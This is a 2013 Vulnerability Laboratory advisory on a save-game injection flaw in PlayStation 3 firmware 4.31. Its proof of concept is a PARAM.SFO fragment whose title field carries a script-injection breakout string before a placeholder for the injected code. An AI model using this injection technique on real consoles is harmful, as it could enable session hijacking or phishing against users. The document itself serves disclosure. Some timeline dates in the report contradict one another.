Title:
======
Sony PS3 Firmware v4.31 - Code Execution Vulnerability

Date:
=====
2013-05-12


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=====
767


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
The PlayStation 3 is the third home video game console produced by Sony 
Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes 
with Microsoft`s Xbox 360 and Nintendo`s Wii 
as part of the seventh generation of video game consoles. It was first released 
on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the 
PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as 
its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )


PlayStation Network, often abbreviated as PSN, is an online multiplayer gaming 
and digital media delivery service provided/run 
by Sony Computer Entertainment for use with the PlayStation 3, PlayStation 
Portable, and PlayStation Vita video game consoles. 
The PlayStation Network is the video game portion of the Sony Entertainment 
Network.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_Network)


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a code execution 
vulnerability in the official Playstation3 v4.31 Firmware.


Report-Timeline:
================
2012-10-26:     Researcher Notification & Coordination
2012-11-18:     Vendor Notification 1
2012-12-14:     Vendor Notification 2
2012-01-18:     Vendor Notification 3
2012-**-**:     Vendor Response/Feedback
2012-05-01:     Vendor Fix/Patch by Check
2012-05-13:     Public Disclosure


Status:
========
Published


Affected Products:
==================
Sony
Product: Playstation 3 4.31


Exploitation-Technique:
=======================
Local


Severity:
=========
High


Details:
========
A local code execution vulnerability is detected in the official Playstation3 
v4.31 Firmware. 
The vulnerability allows local attackers to inject and execute code out of 
vulnerable ps3 menu main web context. 

There are 3 types of save games for the sony ps3. The report is only bound to 
the .sfo save games of the Playstation3.
The ps3 save games sometimes use a PARAM.SFO file in the folder (USB or PS3 HD) 
to display movable text like marquees, 
in combination with a video, sound and the (path) background picture. Normally 
the ps3 firmware parse the redisplayed 
save game values & detail information text when processing to load it via 
usb/ps3-hd. The import ps3 preview filtering 
can be bypassed via a splitted char by char injection of script code or system 
(ps3 firmware) specific commands.

The attacker syncronize his computer (to change the usb context) with USB (Save 
Game) and connects to the network 
(USB, COMPUTER, PS3), updates the save game via computer and can execute the 
context directly out of the ps3 savegame preview 
listing menu (SUB/HD). The exploitation requires local system access, a 
manipulated .sfo file, an usb device. The attacker 
can only use the given byte size of the saved string (attribute values) to 
inject his own commands or script code.

The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not 
recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a 
save game to execute system specific commands 
or inject malicious persistent script code.

Successful exploitation of the vulnerability can result in persistent but local 
system command executions, psn session 
hijacking, persistent phishing attacks, external redirect out of the vulnerable 
module, stable persistent save game preview 
listing context manipulation.


Vulnerable Section(s):
                                [+] PS Menu > Game (Spiel)

Vulnerable Module(s):
                                [+] SpeicherDaten (DienstProgramm) PS3 > USB 
Gerät

Affected Section(s):
                                [+] Title - Save Game Preview Resource (Detail 
Listing)


Proof of Concept:
=================
The firmware preview listing validation vulnerability can be exploited by local 
attackers and with low or medium required user interaction.
For demonstration or reproduce ...

The attacker needs to sync his computer (to change the usb context) with USB 
(Save Game) and connects to the network
(USB, COMPUTER, +PS3), updates the save game via computer and can execute the 
context directly out of the ps3 savegame preview 
listing menu (SUB/HD). The exploitation requires local system access, a 
manipulated .sfo file, an usb device. The attacker 
can only use the given byte size of the saved string (attribute values) to 
inject his own commands or script code.

The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not 
recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a 
save game to execute system specific commands 
or inject malicious persistent script code out of the save game preview listing.

If you inject standard frames or system unknow commands (jailbreak) without 
passing the filter char by char and direct sync 
as update you will fail to reproduce! 

PoC: PARAM.SFO

PSF  Ä   @                                       h      
   %          ,          4       
$  C    @   (  V       h  j 
   €   p  t    €   ð  
ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL 
SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE    
40ac78551a88fdc    
SD  
PSHACK: Benjamin Ninja H%20'>"<[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]

Hackizeit: 1:33:07

ExpSkills: VL-LAB-TRAINING

Operation: 1%
Trojaners: 0%
... Õõ~\˜òíA×éú;óç    40ac78551a88fdc
...
BLES00371-NARUTO_STORM-0
HACKINGBKM 1
PSHACK: Benjamin Ninja H%20'>"<[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!];



Solution:
=========
Restrict the savegame name input and disallow special chars.
Encode the savegame values and redisplaying in the menu preview of the game.
Parse the strings and values from the savegames even if included string by 
string via sync.


Risk:
=====
The security risk of the high exploitable but local vulnerability is estimated 
as critical and needs to be fixed soon.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri  
(b...@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.vulnerability-lab.com/register
Contact:    ad...@vulnerability-lab.com         - supp...@vulnerability-lab.com 
               - resea...@vulnerability-lab.com
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com   
               - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

                                        Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com


Reply via email to